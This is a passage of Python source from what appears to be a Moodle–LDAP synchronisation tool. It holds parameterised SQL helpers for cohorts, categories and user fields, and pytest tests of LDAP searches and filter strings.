Le dictionnaire fourni en parametre indique la liste
des ids utilisateurs appartenant a une cohorte.
Ce dictionnaire est indexe par id de cohortes.
:param users_ids_by_cohorts_ids:
:return:
"""
for cohort_id, users_ids in users_ids_by_cohorts_ids.items():
ids_list, ids_list_params = array_to_safe_sql_list(users_ids, 'ids_list')
s = "DELETE FROM {entete}cohort_members" \
" WHERE cohortid = %(cohort_id)s" \
" AND userid NOT IN ({ids_list})" \
.format(entete=self.entete, ids_list=ids_list)
self.mark.execute(s, params={'cohort_id': cohort_id, **ids_list_params})
def get_user_filtered_cohorts(self, contextid, cohortname_pattern):
"""
Obtient les cohortes de classes d'élèves
:param contextid:
:param cohortname_pattern:
:return:
"""
self.mark.execute("SELECT id, contextid, name FROM {entete}cohort"
" WHERE contextid = %(contextid)s AND name LIKE %(like)s"
.format(entete=self.entete),
params={
'contextid': contextid,
'like': cohortname_pattern
})
return [Cohort(cohortid=result[0], contextid=result[1], name=result[2]) for result in self.mark.fetchall()]
def get_cohort_members(self, cohortid):
"""
Obtient les noms d'utilisateurs membres de la cohorte.
:param cohortid:
:return:
"""
self.mark.execute("SELECT {entete}user.username FROM {entete}cohort_members AS cohort_members"
" INNER JOIN {entete}user ON cohort_members.userid = {entete}user.id"
" WHERE cohortid = %(cohortid)s"
.format(entete=self.entete),
params={
'cohortid': cohortid
})
return map(lambda r: r[0], self.mark.fetchall())
def update_context_path(self, id_context, new_path):
"""
Fonction permettant de mettre a jour le path d'un contexte.
:param id_context:
:param new_path:
:return:
"""
s = "UPDATE {entete}context" \
" SET path = %(new_path)s" \
" WHERE id = %(id_context)s" \
.format(entete=self.entete)
self.mark.execute(s, params={'new_path': new_path, 'id_context': id_context})
def update_course_category_description(self, id_category, new_description):
"""
Fonction permettant de mettre a jour la description
d'une categorie.
:param id_category:
:param new_description:
:return:
"""
s = "UPDATE {entete}course_categories" \
" SET description = %(new_description)s" \
" WHERE id = %(id_category)s" \
.format(entete=self.entete)
self.mark.execute(s, params={'new_description': new_description, 'id_category': id_category})
def update_course_category_name(self, id_category, new_name):
"""
Fonction permettant de mettre a jour le nom
d'une categorie.
:param id_category:
:param new_name:
:return:
"""
s = "UPDATE {entete}course_categories" \
" SET name = %(new_name)s" \
" WHERE id = %(id_category)s" \
.format(entete=self.entete)
self.mark.execute(s, params={'new_name': new_name, 'id_category': id_category})
def update_course_category_path(self, id_category, new_path):
"""
Fonction permettant de mettre a jour le path d'une
categorie.
:param id_category:
:param new_path:
:return:
"""
s = "UPDATE {entete}course_categories" \
" SET path = %(new_path)s" \
" WHERE id = %(id_category)s" \
.format(entete=self.entete)
self.mark.execute(s, params={'new_path': new_path, 'id_category': id_category})
def update_moodle_user(self, id_user, first_name, last_name, email, mail_display, theme):
"""
Fonction permettant de mettre a jour un utilisateur
:param id_user:
:param first_name:
:param last_name:
:param email:
:param mail_display:
:param theme:
:return:
"""
s = "UPDATE {entete}user" \
" SET auth = %(USER_AUTH)s, firstname = %(first_name)s, lastname = %(last_name)s, email = %(email)s," \
" maildisplay = %(mail_display)s, city = %(USER_CITY)s, country = %(USER_COUNTRY)s, lang = %(USER_LANG)s," \
" mnethostid = %(USER_MNET_HOST_ID)s, theme = %(theme)s" \
" WHERE id = %(id_user)s" \
.format(entete=self.entete)
self.mark.execute(s, params={'USER_AUTH': USER_AUTH,
'first_name': first_name,
'last_name': last_name,
'email': email,
'mail_display': mail_display,
'USER_CITY': USER_CITY,
'USER_COUNTRY': USER_COUNTRY,
'USER_LANG': USER_LANG,
'USER_MNET_HOST_ID': USER_MNET_HOST_ID,
'theme': theme,
'id_user': id_user})
def update_user_info_data(self, id_user, id_field, new_data):
"""
Fonction permettant de mettre a jour le data d'un user
info data.
:param id_user:
:param id_field:
:param new_data:
:return:
"""
s = "UPDATE {entete}user_info_data" \
" SET data = %(new_data)s " \
" WHERE userid = %(id_user)s" \
" AND fieldid = %(id_field)s" \
.format(entete=self.entete)
self.mark.execute(s, params={'new_data': new_data, 'id_user': id_user, 'id_field': id_field})
def get_field_domaine(self):
"""
Fonction pour récupére l'id du champ Domaine
:return:
"""
id_field_domaine = []
sql = "SELECT id" \
" FROM {entete}user_info_field" \
" WHERE shortname = 'Domaine'" \
" AND name ='Domaine'" \
.format(entete=self.entete)
self.mark.execute(sql)
row = self.mark.fetchall()
# Si le champ n'existe pas, on le crée et on récupère l'id
if not bool(row):
id_field_domaine = 0
else:
id_field_domaine = row[0][0]
return id_field_domaine
def is_enseignant_avance(self, id_user, id_role_enseignant_avance):
"""
:param id_user:
:param id_role_enseignant_avance:
:return:
"""
sql = "SELECT COUNT(id)" \
" FROM {entete}role_assignments" \
" WHERE userid = %(id_user)s" \
" AND roleid = %(id_role_enseignant_avance)s" \
.format(entete=self.entete)
self.mark.execute(sql, params={'id_user': id_user, 'id_role_enseignant_avance': id_role_enseignant_avance})
result = self.safe_fetchone()
return result[0] > 0
def set_user_domain(self, id_user, id_field_domaine, user_domain):
"""
Fonction pour saisir le Domaine d'un utilisateur Moodle
:param id_user:
:param id_field_domaine:
:param user_domain:
:return:
"""
# pour un utilisateur qui est déjà dans la table "user_info_data" mais sur un autre domaine que
# le domaine "user_domain",
# le script va essayer de créer une nouvelle ligne (INSERT) avec le nouveau domaine => erreur !
# la requête doit donc être modifiée :
# sql = "SELECT id FROM %suser_info_data WHERE userid = %s AND fieldid = %s AND data = '%s'"
sql = "SELECT id" \
" FROM {entete}user_info_data" \
" WHERE userid = %(id_user)s" \
" AND fieldid = %(id_field_domaine)s" \
" LIMIT 1" \
.format(entete=self.entete)
self.mark.execute(sql, params={'id_user': id_user, 'id_field_domaine': id_field_domaine})
result = self.safe_fetchone()
if result:
sql = "REPLACE INTO {entete}user_info_data " \
"(id, userid, fieldid, data)" \
" VALUES (%(id)s, %(id_user)s, %(id_field_domaine)s, %(user_domain)s)" \
.format(entete=self.entete)
self.mark.execute(sql, params={'id': result[0],
'id_user': id_user,
'id_field_domaine': id_field_domaine,
'user_domain': user_domain})
else:
sql = "INSERT INTO {entete}user_info_data " \
"(userid, fieldid, data)" \
" VALUES (%(id_user)s, %(id_field_domaine)s, %(user_domain)s)" \
.format(entete=self.entete)
self.mark.execute(sql, params={'id_user': id_user,
'id_field_domaine': id_field_domaine,
'user_domain': user_domain})
| {"/test/test_timestamp.py": ["/synchromoodle/config.py"], "/synchromoodle/timestamp.py": ["/synchromoodle/config.py"], "/synchromoodle/arguments.py": ["/synchromoodle/__version__.py"], "/synchromoodle/dbutils.py": ["/synchromoodle/config.py"], "/test/test_ldaputils.py": ["/synchromoodle/config.py", "/synchromoodle/ldaputils.py"], "/synchromoodle/webserviceutils.py": ["/synchromoodle/config.py"], "/test/conftest.py": ["/synchromoodle/config.py", "/synchromoodle/dbutils.py", "/synchromoodle/ldaputils.py"], "/synchromoodle/__main__.py": ["/synchromoodle/arguments.py", "/synchromoodle/config.py"], "/synchromoodle/actions.py": ["/synchromoodle/synchronizer.py", "/synchromoodle/timestamp.py", "/synchromoodle/arguments.py", "/synchromoodle/config.py", "/synchromoodle/dbutils.py", "/synchromoodle/ldaputils.py"], "/test/utils/db_utils.py": ["/synchromoodle/dbutils.py"], "/synchromoodle/ldaputils.py": ["/synchromoodle/config.py"], "/test/utils/ldap_utils.py": ["/synchromoodle/ldaputils.py"], "/synchromoodle/synchronizer.py": ["/synchromoodle/arguments.py", "/synchromoodle/config.py", "/synchromoodle/dbutils.py", "/synchromoodle/ldaputils.py", "/synchromoodle/webserviceutils.py"], "/test/test_config.py": ["/synchromoodle/config.py"], "/test/test_synchronizer.py": ["/synchromoodle/config.py", "/synchromoodle/dbutils.py", "/synchromoodle/ldaputils.py", "/synchromoodle/synchronizer.py"]} |
78,259 | GIP-RECIA/ESCOSynchroMoodle | refs/heads/develop | /test/test_ldaputils.py | # coding: utf-8
from datetime import datetime
import pytest
from ldap3 import Connection
from synchromoodle import ldaputils
from synchromoodle.config import Config
from synchromoodle.ldaputils import Ldap, StructureLdap, PersonneLdap, EleveLdap, EnseignantLdap
from test.utils import ldap_utils
datetime_value = datetime(2019, 4, 9, 21, 42, 1)
@pytest.fixture(scope='function')
def ldap(docker_config: Config):
ldap = Ldap(docker_config.ldap)
ldap_utils.reset(ldap)
return ldap
def test_connection(ldap: Ldap):
ldap.connect()
assert isinstance(ldap.connection, Connection)
ldap.disconnect()
assert ldap.connection is None
def test_structures(ldap: Ldap):
ldap.connect()
ldap_utils.run_ldif('data/default-structures.ldif', ldap)
structures = ldap.search_structure()
assert len(structures) == 2
for structure in structures:
assert isinstance(structure, StructureLdap)
getted_structure = ldap.get_structure(structure.uai)
assert isinstance(getted_structure, StructureLdap)
ldap.disconnect()
def test_structures_empty(ldap: Ldap):
ldap.connect()
structures = ldap.search_structure()
assert len(structures) == 0
ldap.disconnect()
def test_personnes(ldap: Ldap):
ldap.connect()
ldap_utils.run_ldif('data/default-personnes-short.ldif', ldap)
personnes = ldap.search_personne()
assert len(personnes) == 77
for person in personnes:
assert isinstance(person, PersonneLdap)
ldap.disconnect()
def test_personnes_empty(ldap: Ldap):
ldap.connect()
personnes = ldap.search_personne()
assert len(personnes) == 0
ldap.disconnect()
def test_eleves(ldap: Ldap):
ldap.connect()
ldap_utils.run_ldif('data/default-personnes-short.ldif', ldap)
eleves = ldap.search_eleve()
assert len(eleves) > 0
for student in eleves:
assert isinstance(student, EleveLdap)
ldap.disconnect()
def test_eleves_empty(ldap: Ldap):
ldap.connect()
eleves = ldap.search_eleve()
assert len(eleves) == 0
ldap.disconnect()
def test_teachers(ldap: Ldap):
ldap.connect()
ldap_utils.run_ldif('data/default-personnes-short.ldif', ldap)
enseignants = ldap.search_enseignant()
assert len(enseignants) > 0
for enseignant in enseignants:
assert isinstance(enseignant, EnseignantLdap)
ldap.disconnect()
def test_teachers_empty(ldap: Ldap):
ldap.connect()
enseignants = ldap.search_enseignant()
assert len(enseignants) == 0
ldap.disconnect()
def test_get_filtre_eleves():
assert ldaputils._get_filtre_eleves() == \
"(&(objectClass=ENTEleve))"
assert ldaputils._get_filtre_eleves(uai="some-uai") == "(&(objectClass=ENTEleve)(ESCOUAI=some-uai))"
assert ldaputils._get_filtre_eleves(since_timestamp=datetime_value) == \
"(&(objectClass=ENTEleve)(modifyTimeStamp>=20190409214201Z))"
assert ldaputils._get_filtre_eleves(since_timestamp=datetime_value, uai="other-uai") == \
"(&(objectClass=ENTEleve)(ESCOUAI=other-uai)(modifyTimeStamp>=20190409214201Z))"
def test_get_filtre_etablissement():
assert ldaputils._get_filtre_etablissement("0290009C") == "(&(ObjectClass=ENTEtablissement)" \
"(!(ENTStructureSiren=0000000000000A))" \
"(ENTStructureUAI=0290009C))"
assert ldaputils._get_filtre_etablissement() == "(&(ObjectClass=ENTEtablissement)" \
"(!(ENTStructureSiren=0000000000000A)))"
def test_get_filtre_personnes():
assert ldaputils._get_filtre_personnes(datetime_value) == \
"(&(|(objectClass=ENTPerson))(!(uid=ADM00000))" \
"(modifyTimeStamp>=20190409214201Z))"
assert ldaputils._get_filtre_personnes(datetime_value, foo="bar", hello=["world", "dude"]) in \
["(&(|(objectClass=ENTPerson))"
"(!(uid=ADM00000))"
"(|(foo=bar)(hello=world)(hello=dude))"
"(modifyTimeStamp>=20190409214201Z))",
"(&(|(objectClass=ENTPerson))"
"(!(uid=ADM00000))"
"(|(hello=world)(hello=dude)(foo=bar))"
"(modifyTimeStamp>=20190409214201Z))"]
def test_get_filtre_enseignants():
assert ldaputils.get_filtre_enseignants() == "(&(objectClass=ENTAuxEnseignant)" \
"(!(uid=ADM00000)))"
assert ldaputils.get_filtre_enseignants(datetime_value, "UAI00000", True) == \
"(&" \
"(|(objectClass=ENTAuxEnseignant)" \
"(objectClass=ENTAuxNonEnsEtab)" \
"(objectClass=ENTAuxNonEnsCollLoc)" \
")" \
"(!(uid=ADM00000))" \
"(ESCOUAI=UAI00000)" \
"(modifyTimeStamp>=20190409214201Z))"
| {"/test/test_timestamp.py": ["/synchromoodle/config.py"], "/synchromoodle/timestamp.py": ["/synchromoodle/config.py"], "/synchromoodle/arguments.py": ["/synchromoodle/__version__.py"], "/synchromoodle/dbutils.py": ["/synchromoodle/config.py"], "/test/test_ldaputils.py": ["/synchromoodle/config.py", "/synchromoodle/ldaputils.py"], "/synchromoodle/webserviceutils.py": ["/synchromoodle/config.py"], "/test/conftest.py": ["/synchromoodle/config.py", "/synchromoodle/dbutils.py", "/synchromoodle/ldaputils.py"], "/synchromoodle/__main__.py": ["/synchromoodle/arguments.py", "/synchromoodle/config.py"], "/synchromoodle/actions.py": ["/synchromoodle/synchronizer.py", "/synchromoodle/timestamp.py", "/synchromoodle/arguments.py", "/synchromoodle/config.py", "/synchromoodle/dbutils.py", "/synchromoodle/ldaputils.py"], "/test/utils/db_utils.py": ["/synchromoodle/dbutils.py"], "/synchromoodle/ldaputils.py": ["/synchromoodle/config.py"], "/test/utils/ldap_utils.py": ["/synchromoodle/ldaputils.py"], "/synchromoodle/synchronizer.py": ["/synchromoodle/arguments.py", "/synchromoodle/config.py", "/synchromoodle/dbutils.py", "/synchromoodle/ldaputils.py", "/synchromoodle/webserviceutils.py"], "/test/test_config.py": ["/synchromoodle/config.py"], "/test/test_synchronizer.py": ["/synchromoodle/config.py", "/synchromoodle/dbutils.py", "/synchromoodle/ldaputils.py", "/synchromoodle/synchronizer.py"]} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.